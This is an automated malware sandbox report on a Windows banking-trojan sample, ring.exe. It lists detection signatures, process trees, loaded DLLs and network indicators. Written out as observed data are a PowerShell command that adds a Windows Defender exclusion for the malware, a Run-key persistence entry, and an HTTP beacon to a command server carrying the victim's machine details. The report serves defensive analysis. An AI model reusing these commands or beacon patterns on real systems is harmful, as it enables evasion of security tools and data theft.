Edit tour

Windows Analysis Report
ring.exe

Overview

General Information

Sample name:ring.exe
Analysis ID:1558818
MD5:dec85de31c5a9e3754ab0fcfed8a3e79
SHA1:b47c8f4918518f1538842b5b12bc5dcbea5c3d59
SHA256:fa4f6da9ea8aca025d129328ce57b36343a1bc8796d1846d02157d2242f904a8
Tags:154-205-156-20api-computadoratualizacao-comexemesh-computadoratualizacao-comuser-johnk3r
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens network shares
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • ring.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\ring.exe" MD5: DEC85DE31C5A9E3754AB0FCFED8A3E79)
    • cmd.exe (PID: 2460 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2928 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • WmiPrvSE.exe (PID: 7272 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • ring.exe (PID: 7464 cmdline: "C:\Users\user\AppData\Roaming\Win_24230\ring.exe" MD5: DEC85DE31C5A9E3754AB0FCFED8A3E79)
  • ring.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Roaming\Win_24230\ring.exe" MD5: DEC85DE31C5A9E3754AB0FCFED8A3E79)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ring.exe", ParentImage: C:\Users\user\Desktop\ring.exe, ParentProcessId: 6300, ParentProcessName: ring.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", ProcessId: 2460, ProcessName: cmd.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Win_24230\ring.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ring.exe, ProcessId: 6300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinSesp
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ring.exe", ParentImage: C:\Users\user\Desktop\ring.exe, ParentProcessId: 6300, ParentProcessName: ring.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", ProcessId: 2460, ProcessName: cmd.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2460, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", ProcessId: 2928, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-19T20:36:17.886678+010020203151A Network Trojan was detected192.168.2.74970724.152.39.1355417TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-19T20:36:18.601634+010020203161A Network Trojan was detected24.152.39.1355417192.168.2.749707TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeReversingLabs: Detection: 18%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.8% probability
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeJoe Sandbox ML: detected
Source: ring.exeJoe Sandbox ML: detected
Source: ring.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ring.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

barindex
Source: Network trafficSuricata IDS: 2020315 - Severity 1 - ET MALWARE KL-Remote / Cryp_Banker14 RAT connection : 192.168.2.7:49707 -> 24.152.39.13:55417
Source: Network trafficSuricata IDS: 2020316 - Severity 1 - ET MALWARE KL-Remote / Cryp_Banker14 RAT response : 24.152.39.13:55417 -> 192.168.2.7:49707
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 24.152.39.13:55417
Source: Joe Sandbox ViewIP Address: 104.237.62.213 104.237.62.213
Source: Joe Sandbox ViewASN Name: MasterDaWebBR MasterDaWebBR
Source: unknownDNS query: name: api64.ipify.org
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1Host: api64.ipify.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: unknownTCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknownTCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknownTCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknownTCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknownTCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknownTCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknownTCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknownTCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknownTCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknownTCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknownTCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1Host: api64.ipify.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Build%2019045%29%20&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A&status=Instalada&ip=8.46.123.75 HTTP/1.1User-Agent: Delphi 5.xHost: 154.205.156.20Cache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: api64.ipify.org
Source: global trafficDNS traffic detected: DNS query: adsklbb.org
Source: ring.exe, ring.exe.4.drString found in binary or memory: http://154.205.156.20/Painel/atualiza_update.php
Source: ring.exe, ring.exe.4.drString found in binary or memory: http://154.205.156.20/Painel/atualizar_dados.php
Source: ring.exe, 00000004.00000002.2527929541.0000000001ADD000.00000004.00000020.00020000.00000000.sdmp, ring.exe, 00000004.00000002.2529177771.000000000366D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28B
Source: ring.exe, ring.exe.4.drString found in binary or memory: http://api64.ipify.org/?format=text
Source: ring.exe, ring.exe.4.drString found in binary or memory: http://www.indyproject.org/
Source: ring.exe.4.drStatic PE information: Number of sections : 11 > 10
Source: ring.exeStatic PE information: Number of sections : 11 > 10
Source: ring.exe, 00000004.00000002.2527929541.0000000001B1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs ring.exe
Source: ring.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal84.spyw.evad.winEXE@9/9@2/3
Source: C:\Users\user\Desktop\ring.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\atualizar_dados[1].htmJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5976:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Users\user\Desktop\ring.exeMutant created: \Sessions\1\BaseNamedObjects\kkdiiii
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kecezh5z.vbm.ps1Jump to behavior
Source: C:\Users\user\Desktop\ring.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\ring.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\ring.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\ring.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: ring.exeString found in binary or memory: NATS-SEFI-ADD
Source: ring.exeString found in binary or memory: NATS-DANO-ADD
Source: ring.exeString found in binary or memory: JIS_C6229-1984-b-add
Source: ring.exeString found in binary or memory: jp-ocr-b-add
Source: ring.exeString found in binary or memory: JIS_C6229-1984-hand-add
Source: ring.exeString found in binary or memory: jp-ocr-hand-add
Source: ring.exeString found in binary or memory: ISO_6937-2-add
Source: C:\Users\user\Desktop\ring.exeFile read: C:\Users\user\Desktop\ring.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\ring.exe "C:\Users\user\Desktop\ring.exe"
Source: C:\Users\user\Desktop\ring.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Win_24230\ring.exe "C:\Users\user\AppData\Roaming\Win_24230\ring.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Win_24230\ring.exe "C:\Users\user\AppData\Roaming\Win_24230\ring.exe"
Source: C:\Users\user\Desktop\ring.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"Jump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: magnification.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: security.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: idndl.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: vboxhook.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: magnification.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: security.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: idndl.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: magnification.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: security.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: idndl.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\ring.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: ring.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: ring.exeStatic file information: File size 17488384 > 1048576
